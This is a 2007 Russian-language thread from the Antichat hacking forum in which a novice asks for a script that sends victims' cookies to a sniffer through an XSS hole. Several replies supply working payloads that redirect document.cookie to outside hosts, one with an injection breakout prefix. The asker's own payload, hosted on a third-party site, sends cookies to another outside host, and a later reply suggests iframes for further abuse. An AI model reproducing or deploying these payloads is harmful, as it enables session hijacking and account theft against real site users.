ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Java-скрипт перенапрваляющий на снифер
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Java-скрипт перенапрваляющий на снифер
  #1  
Старый 09.11.2007, 23:10
RamN999
Новичок
Регистрация: 07.11.2007
Сообщений: 3
Провел на форуме:
9746

Репутация: -5
По умолчанию Java-скрипт перенапрваляющий на снифер
Добрый день!
Подскажите пожалуста содержания скрипта
чтоб он напрвалял куки на снифер.
Например
в xxs уязвимости я писал бы <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

и получал бы куки на снифер..
тоесть надо содержание xss.js

спс
 
Ответить с цитированием

  #2  
Старый 09.11.2007, 23:18
__mad
Участник форума
Регистрация: 04.11.2007
Сообщений: 103
Провел на форуме:
548128

Репутация: 104
По умолчанию
<script>document.location='http://ha.ckers.org/xss.js' +document.cookie</script>
 
Ответить с цитированием

  #3  
Старый 10.11.2007, 00:06
RamN999
Новичок
Регистрация: 07.11.2007
Сообщений: 3
Провел на форуме:
9746

Репутация: -5
По умолчанию
Я сделал файл xss1.js с такаим содержание :
<script>document.location='http://hackedpro.org/tools/sniff/s.gif' +document.cookie</script>

И залил его сюда: http://xss999.jino-net.ru/xss1.js

теперь я в найденой xss уязвимости пишу : "'><SCRIPT SRC=http://xss999.jino-net.ru/xss1.js></SCRIPT>


но всёравно посемуто не получаю лог на снифер, где я ошибся?
 
Ответить с цитированием

  #4  
Старый 10.11.2007, 00:15
Piflit
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756

Репутация: 2032


Отправить сообщение для Piflit с помощью ICQ
По умолчанию
пиши в найденной xss "'><script>document.location='http://ha.ckers.org/xss.js' +document.cookie</script>
 
Ответить с цитированием

  #5  
Старый 10.11.2007, 00:20
__mad
Участник форума
Регистрация: 04.11.2007
Сообщений: 103
Провел на форуме:
548128

Репутация: 104
По умолчанию
кароч читай вот это http://bugtraq.ru/library/www/xssanatomy.html
 
Ответить с цитированием

  #6  
Старый 10.11.2007, 19:10
RamN999
Новичок
Регистрация: 07.11.2007
Сообщений: 3
Провел на форуме:
9746

Репутация: -5
По умолчанию
Всё спс разобрался,но теперь ещё вопрос есть..
Что можно сделать(помимо воровства куки) с помощью Xss уязвимости, если ваще нет никакой фильтрацции, тоесть допустимы любые теги?
 
Ответить с цитированием

  #7  
Старый 10.11.2007, 22:31
fly
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842

Репутация: 251


Отправить сообщение для fly с помощью ICQ
По умолчанию
Ифрейм!)
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обзор современных Web технологий baltazar Статьи 1 30.10.2007 02:29
60 Эро Джава Игр =)) SK | Heaton Схемы и программы 4 05.04.2007 09:22
Разные скрипты r@mbler PHP, PERL, MySQL, JavaScript 4 06.03.2007 18:08
Все для прокачки мобильного 2007 ~!DoK_tOR!~ Схемы и программы 2 05.03.2007 21:29
Словарь Java-терминов foreva Чужие Статьи 0 08.02.2005 16:28



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ